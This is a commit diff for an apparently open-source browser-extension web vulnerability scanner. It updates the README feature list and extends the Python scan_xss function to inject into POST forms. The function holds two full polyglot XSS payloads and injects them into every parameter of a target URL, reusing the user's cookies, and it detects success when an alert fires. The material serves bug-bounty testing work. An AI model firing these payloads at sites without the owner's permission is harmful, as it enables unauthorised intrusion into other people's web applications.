POST Scan XSS

master
swisskyrepo 2016-12-31 15:21:22 +01:00
parent 43e7eb8f06
commit 84ffc771a5
2 changed files with 39 additions and 25 deletions

View File

@ -8,6 +8,18 @@ Currently it scans for:
- Local File Inclusion
- Remote Commands Execution
All the features are:
- Detect if the server is up
- Start/Stop button
- New XSS vectors, work in different contexts (JS var, JS function, inside HTML tag, outside HTML tag)
- Basic page to list the vulnerabilities URL and TYPE
- Time based SQLi scanner using polyglot vectors (MySQL, SQLite, Oracle, Postgresql, SQL Server)
- RCE scanner using polyglot vectors based on time
- New logo for the extension
- Re-use your cookies and user-agent to get access to page with cookie-authentication
- Export vulnerabilities into a CSV file
- Launch scan when a form is submitted or a page is opened via the URL bar
**Warnings :** Do not use this extension for illegal purpose, the main goal of it is to simplify the life of bug hunters. It's a **BETA version**, many improvements will come don't worry
## Install
@ -36,22 +48,6 @@ var config_server = "http://127.0.0.1:8000";
4 - Browse the internet ! (Don't forget to start the extension by clicking the 'START' button)
You can try the Error SQL, Blind SQL, LFI with Damn Vulnerable Web App
## New features
- Detect if the server is up
- Start/Stop button
- New XSS vectors, work in different contexts (JS var, JS function, inside HTML tag, outside HTML tag)
- Basic page to list the vulnerabilities URL and TYPE
- Time based SQLi scanner using polyglot vectors (MySQL, SQLite, Oracle, Postgresql, SQL Server)
- RCE scanner using polyglot vectors based on time
- New logo for the extension
- Re-use your cookies and user-agent to get access to page with cookie-authentication
- Export vulnerabilities into a CSV file
- Launch scan when a form is submitted or a page is opened via the URL bar
## TODO - Work in progress
- Should detect target in source code.. (list of targets, then launch scan)
- Do xss for POST with data dict
## Thanks
- Polyglot vector for SQL injections [The Ultimate SQL Injection Payload](https://labs.detectify.com/2013/05/29/the-ultimate-sql-injection-payload/)
- Polyglot vector for XSS injection 1 [One vector to rule them all](http://www.thespanner.co.uk/2010/09/15/one-vector-to-rule-them-all/)

View File

@ -6,22 +6,34 @@ import requests
import datetime
import re
"""scan_xss /!\ TODO : POST request (check method, data)
"""scan_xss
Description: inject a polyglot vector for XSS in every parameter, then it checks if an alert was triggered
Parameters: vulns - list of vulnerabilities, url - address of the target, fuzz - parameter we modify
"""
def scan_xss(method, vulns, url, fuzz, cookie, useragent, firefox, data):
payload = 'jaVasCript:alert(1)//" name=alert(1) onErrOr=eval(name) src=1 autofocus oNfoCus=eval(name)><marquee><img src=x onerror=alert(1)></marquee>" ></textarea\></|\><details/open/ontoggle=prompt`1` ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>\'-->" ></script><sCrIpt>confirm(1)</scRipt>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>\'"><!--'
payload1 = 'javascript:/*-->]]>%>?></script></title></textarea></noscript></style></xmp>">[img=1,name=/alert(1)/.source]<img -/style=a:expression&#40&#47&#42\'/-/*&#39,/**/eval(name)/*%2A///*///&#41;;width:100%;height:100%;position:absolute;-ms-behavior:url(#default#time2) name=alert(1) onerror=eval(name) src=1 autofocus onfocus=eval(name) onclick=eval(name) onmouseover=eval(name) onbegin=eval(name) background=javascript:eval(name)//>"'
print repr(fuzz),"fuzz"
try:
with firefox.start() as session:
# Send GET XSS
# POST
if (method == 'POST' and fuzz != ''):
inject = dict(data)
inject[fuzz] = inject[fuzz] + payload
del inject['']
page, extra_resources = session.open(url, headers={'Cookie':cookie}, user_agent=useragent)
result, resources = session.fill("form", inject)
page, resources = session.call("form", "submit", expect_loading=True)
result, resources = session.wait_for_alert(1)
inject = url + ":" + fuzz + ":" + inject[fuzz]
# GET
if (method == 'GET'):
inject = url.replace(fuzz+"=", fuzz+"="+payload)
page, extra_resources = session.open(inject, headers={'Cookie':cookie}, user_agent=useragent)
result, resources = session.wait_for_alert(1)
# Detect XSS result with an alert
if result == '1':
print "\t\t\033[93mXSS Detected \033[0m for ", fuzz, " with the payload :", payload
@ -31,6 +43,12 @@ def scan_xss(method, vulns, url, fuzz, cookie, useragent, firefox, data):
print "\t\t\033[94mXSS Failed \033[0m for ", fuzz, " with the payload :", payload
except Exception, e:
if "alert" in str(e):
print "\t\t\033[93mXSS Detected \033[0m for ", fuzz, " with the payload :", payload
inject = url + ":" + fuzz + ":" + payload
vulns['xss'] += 1
vulns['list'] += 'XSS|TYPE|'+inject+'|DELIMITER|'
else:
print "\t\t\033[94mXSS Failed \033[0m for ", fuzz, " with the payload :", payload